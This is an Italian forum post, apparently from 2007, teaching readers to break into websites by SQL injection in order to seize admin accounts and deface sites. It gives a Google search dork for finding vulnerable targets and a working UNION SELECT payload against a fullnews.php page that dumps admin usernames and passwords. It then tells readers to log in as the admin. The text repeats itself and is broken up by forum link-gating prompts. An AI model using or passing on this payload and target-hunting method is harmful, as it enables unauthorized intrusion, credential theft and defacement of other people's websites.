- 18 Agosto 2007
- 2.775
- 0
- Miglior risposta
- 0
Salve,oggi vi scrivo questa guida per insegnarvi ad eseguire la tecnica SQL Injection.
Con questa tecnica è possibile impossessarsi dell'Admin e quindi avere la possibilità di defacciarlo.
Premessa : Non tutti i siti sono vulnerabili,perciò dovrete andare a tentativi o usare uno scanner .
Altra Premessa : Non mi assumo la responsabilità dei danni arrecati ai siti Web,voi siete gli unici responsabili delle vostre azioni e dell'uso che nè farete della guida.
Iniziamo andando su GOOGLE (
"Browse with Interactive Map" (con le apici)
Adesso proviamo qualche sito a caso.
Apriamolo e scriviamo sul link
Perciò se il sito fosse paperinomuore.it dovrete scrivere
Se tutto andrà bene sulla pagina verrà scritto
user:password
ad esempio mettiamo che User sia PLUTO e password 123 voi vedrete apparire
PLUTO:123
Adesso effettuiamo il Login con PLUTO (che è l'ADMIN,perchè vedrete l'USER dell'Admin ) e potrete fare ciò che volete.
Niente Lamerate.
FONTE : ME
Hacked By HaCk-GaMe (lol)
Con questa tecnica è possibile impossessarsi dell'Admin e quindi avere la possibilità di defacciarlo.
Premessa : Non tutti i siti sono vulnerabili,perciò dovrete andare a tentativi o usare uno scanner .
Altra Premessa : Non mi assumo la responsabilità dei danni arrecati ai siti Web,voi siete gli unici responsabili delle vostre azioni e dell'uso che nè farete della guida.
Iniziamo andando su GOOGLE (
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
) e scrivendo questa DORK per trovare siti vulnerabili :"Browse with Interactive Map" (con le apici)
Adesso proviamo qualche sito a caso.
Apriamolo e scriviamo sul link
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
- co.uk - ecc... )/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*Perciò se il sito fosse paperinomuore.it dovrete scrivere
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Se tutto andrà bene sulla pagina verrà scritto
user:password
ad esempio mettiamo che User sia PLUTO e password 123 voi vedrete apparire
PLUTO:123
Adesso effettuiamo il Login con PLUTO (che è l'ADMIN,perchè vedrete l'USER dell'Admin ) e potrete fare ciò che volete.
Niente Lamerate.
FONTE : ME
Hacked By HaCk-GaMe (lol)